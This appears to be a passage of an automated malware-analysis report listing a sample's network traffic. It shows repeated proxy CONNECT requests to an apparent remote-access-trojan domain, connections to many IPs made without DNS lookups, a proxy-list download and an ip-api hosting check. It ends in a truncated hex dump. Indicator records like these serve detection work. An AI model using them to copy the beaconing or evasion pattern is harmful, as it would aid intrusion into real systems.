                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                  Source: unknownTCP traffic detected without corresponding DNS query: 50.63.12.33
                  Source: unknownTCP traffic detected without corresponding DNS query: 50.174.145.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 196.43.106.62
                  Source: unknownTCP traffic detected without corresponding DNS query: 174.75.211.222
                  Source: unknownTCP traffic detected without corresponding DNS query: 72.169.67.85
                  Source: unknownTCP traffic detected without corresponding DNS query: 38.162.29.193
                  Source: unknownTCP traffic detected without corresponding DNS query: 93.90.212.2
                  Source: unknownTCP traffic detected without corresponding DNS query: 170.81.141.49
                  Source: unknownTCP traffic detected without corresponding DNS query: 162.214.225.223
                  Source: unknownTCP traffic detected without corresponding DNS query: 50.235.117.234
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.71.49.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.27.37.131
                  Source: unknownTCP traffic detected without corresponding DNS query: 202.183.9.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.166.186.145
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.128.96.213
                  Source: unknownTCP traffic detected without corresponding DNS query: 208.87.131.240
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.32.6.131
                  Source: unknownTCP traffic detected without corresponding DNS query: 81.91.139.76
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.159.131.58
                  Source: unknownTCP traffic detected without corresponding DNS query: 50.207.199.80
                  Source: unknownTCP traffic detected without corresponding DNS query: 190.220.1.173
                  Source: unknownTCP traffic detected without corresponding DNS query: 189.29.143.202
                  Source: unknownTCP traffic detected without corresponding DNS query: 47.242.155.132
                  Source: unknownTCP traffic detected without corresponding DNS query: 203.89.8.107
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.111.138.29
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.118.132.125
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.76.160.143
                  Source: unknownTCP traffic detected without corresponding DNS query: 205.196.184.69
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.39.31.66
                  Source: unknownTCP traffic detected without corresponding DNS query: 47.114.101.57
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.135.83.214
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.180.103.214
                  Source: unknownTCP traffic detected without corresponding DNS query: 148.72.209.174
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.227.38.198
                  Source: unknownTCP traffic detected without corresponding DNS query: 199.58.185.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 61.254.81.88
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.223.121.72
                  Source: unknownTCP traffic detected without corresponding DNS query: 175.139.179.65
                  Source: unknownTCP traffic detected without corresponding DNS query: 36.66.133.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 132.148.245.247
                  Source: unknownTCP traffic detected without corresponding DNS query: 50.168.72.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 159.65.253.201
                  Source: unknownTCP traffic detected without corresponding DNS query: 114.156.77.107
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.67.182.83
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.204.134.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.199.155.18
                  Source: unknownTCP traffic detected without corresponding DNS query: 178.115.253.35
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.44.188.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 213.125.215.188
                  Source: global trafficHTTP traffic detected: GET /TheSpeedX/PROXY-List/blob/master/http.txt HTTP/1.1Host: github.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: unknownDNS traffic detected: queries for: github.com
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenConnection: closeContent-Type: text/htmlCache-Control: no-cacheX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffContent-Length: 4872Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 38 3b 20 49 45 3d 45 44 47 45 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 52 6f 62 6f 74 6f 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 36 61 36 61 36 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 70 75 74 5b 74 79 70 65 3d 64 61 74 65 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 65 6d 61 69 6c 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 6e 75 6d 62 65 72 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 70 61 73 73 77 6f 72 64 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 73 65 61 72 63 68 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 6c 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 78 74 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 69 6d 65 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 75 72 6c 5d 2c 20 73 65 6c 65 63 74 2c 20 74 65 78 74 61 72 65 61 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 36 32 36 32 36 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 2
